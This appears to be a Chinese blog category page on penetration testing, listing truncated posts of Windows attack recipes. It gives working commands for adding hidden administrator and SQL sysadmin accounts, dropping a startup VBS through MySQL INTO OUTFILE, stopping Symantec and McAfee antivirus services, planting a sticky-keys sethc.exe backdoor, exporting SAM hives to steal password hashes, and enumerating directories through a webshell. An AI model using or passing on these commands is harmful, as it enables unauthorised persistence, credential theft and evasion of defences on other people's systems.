Cmd、Dos 命令行下添加 SQL 用户的方法: 需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下: exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember ‘test, ‘sysadmin’ 然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry 另类的加用户方法: 在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下: js: var o=new ActiveXObject( “Shell.Users” ); z=o.create(“test”) ; z.changePassword(“123456″,””) z.setting(“AccountType”)=3; vbs: Set o=CreateObject( […]
Web安全与渗透
Cmd 修改访问控制权限
Cmd 访问控制权限控制: 命令如下: cacls c: /e /t /g everyone:F #c盘everyone权限 cacls “目录” /d everyone #everyone不可读,包括admin 备注:反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
MySql添加管理员方法
MySql添加管理员,需重启: create table a (cmd text); insert into a values (“set wshshell=createobject (“”wscript.shell””)”); insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”); insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”); select * from a into outfile “C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs”;
各种杀软企业版本渗透处理办法
处理变态诺顿企业版: net stop “Symantec AntiVirus” /y net stop “Symantec AntiVirus Definition Watcher” /y net stop “Symantec Event Manager” /y net stop “System Event Notification” /y net stop “Symantec Settings Manager” /y 麦咖啡: net stop “McAfee McShield” Symantec病毒日志: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs Symantec病毒备份: C:\Documents and Settings\All U […]
添加windows后门方法
安装5次shift后门,沾滞键后门,替换SHIFT后门: 沾滞键后门: copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y 替换SHIFT后门: attrib c:\windows\system32\sethc.exe -h -r -s attrib c:\windows\system32\dllcache\sethc.exe -h -r -s del c:\windows\system32\ […]
windows-变相获取渗透机器的账号密码
Gethash 获取本机 hash: 首先导出注册表: Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意权限问题,一般注册表默认sam目录是不能访问的。 需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。 接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机, 然后用抓去hash的工具抓本地用户就OK了 hash 抓完了记得把自己的账户密码改过来! 当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。 然后… […]
winddos在Dos下目录操作技巧
winddos在Dos下目录操作技巧,主要用来渗透时,通过webshell执行命令。 列出d的所有目录: for /d %i in (d:\freehost\*) do @echo %i 把当前路径下文件夹的名字只有1-3个字母的显示出来: for /d %i in (???) do @echo %i 以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出: for /r %i in (*.exe) do @echo %i 以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出: for /r “f:\freehost\hmadesign\web\” %i in (*.*) do @echo %i 这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中: for /f %i in (c:\1.txt) do echo %i delims=后的空格是分隔符,to […]